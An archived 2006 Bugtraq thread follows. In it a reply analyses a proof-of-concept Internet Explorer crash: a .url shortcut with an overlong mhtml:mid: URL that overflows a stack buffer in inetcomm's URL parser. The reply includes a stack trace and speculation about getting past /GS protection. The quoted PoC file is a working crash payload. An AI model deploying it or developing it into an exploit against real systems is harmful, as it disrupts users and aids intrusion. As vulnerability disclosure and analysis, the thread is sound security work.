<<< Date Index >>>     <<< Thread Index >>>

Re: Internet explorer Vulnerbility

I see this work in explorer and my ie 7 beta, both of them crashes. But this does not seem to be easily exploitable. It is a simple stack buffer overun issue. The problem seems to be in inetcomm!CActiveUrlRequest::ParseUrl..... now inetcomm seemed to have been gs flagged complied,hence the ovewrite of the security cookie casuses the internal handler inetcomm!__report_gsfailure to be called on fucntion return. This could be exploitable if we some evasive techniques is used. But on the face of it does not seem like a easy nut to crack.
All applications which use inetcomm are vulnerable if they are using url parsing, specially mhtml:cid or mid, havent tried others yet, maybe possible. 


Thanks
-Hariharan
PS: This is what the stack looks like, notice the 'a' in it, seems internally the fucntion converts the url case. 


00df9318 7c802542 00000758 000493e0 00000000 ntdll!KiFastSystemCallRet
00df932c 6945ada6 00000758 000493e0 003a0043 kernel32!WaitForSingleObject+0x12
00df9e10 6945aff1 00000734 00000b90 00000748 faultrep!InternalGenerateMinidumpEx+0x335
00df9e3c 6945b50a 00000734 00000b90 00dfa7e0 faultrep!InternalGenerateMinidump+0x75
00dfa718 69456652 00000734 00000b90 00dfa7e0 faultrep!InternalGenFullAndTriageMinidumps+0x8a 

00dfbfd8 69457d3d 00dfc040 0154f660 00000000 faultrep!ReportFaultDWM+0x4e5
00dfc4c0 694582d8 00dfdad8 00dfd308 00000001 faultrep!StartManifestReportImmediate+0x268 

00dfd52c 7c863059 00dfdad8 00000001 00dfd800 faultrep!ReportFault+0x55a
00dfd7a0 761e234e 00dfdad8 00000000 c0000409 kernel32!UnhandledExceptionFilter+0x4cf
00dfdae0 761769f2 00000000 00000000 00000000 inetcomm!__report_gsfailure+0xe3
00dfe444 61616161 61616161 61616161 61616161 inetcomm!CActiveUrlRequest::ParseUrl+0x67e 

00dfe468 61616161 61616161 61616161 61616161 0x61616161

00dfe46c 61616161 61616161 61616161 61616161 0x61616161

00dfe470 61616161 61616161 61616161 61616161 0x61616161

00dfe474 61616161 61616161 61616161 61616161 0x61616161

00dfe478 61616161 61616161 61616161 61616161 0x61616161

00dfe47c 61616161 61616161 61616161 61616161 0x61616161

00dfe480 61616161 61616161 61616161 61616161 0x61616161

00dfe484 61616161 61616161 61616161 61616161 0x61616161

00dfe488 61616161 61616161 61616161 61616161 0x61616161
----- Original Message ----- From: <Mr.Niega@xxxxxxxxx> 
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Thursday, June 01, 2006 1:42 AM
Subject: Internet explorer Vulnerbility



------------------------------Niega.url-------------------------------

[DEFAULT]

BASEURL=

[InternetShortcut]

URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

A

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

/*

*

* Internet Explorer overflow Vulnerbility [Proof of concept]

* Bug discovered by Mr.Niega

* http://www.swerat.com/

*

* Affected Software: Microsoft Internet Explorer 6.x

* Severity: Unknown

* Impact: Crash

* Solution Status: Unpatched

*

* E-Mail: Mr.Niega@xxxxxxxxx

* Credits goes out to MarjinZ and Andvare

*

* Note: By right clicking on the file explorer will crash

* Note: del=crash,F2=crash Use cmd to delete file

*/
------------------------------Niega.url-------------------------------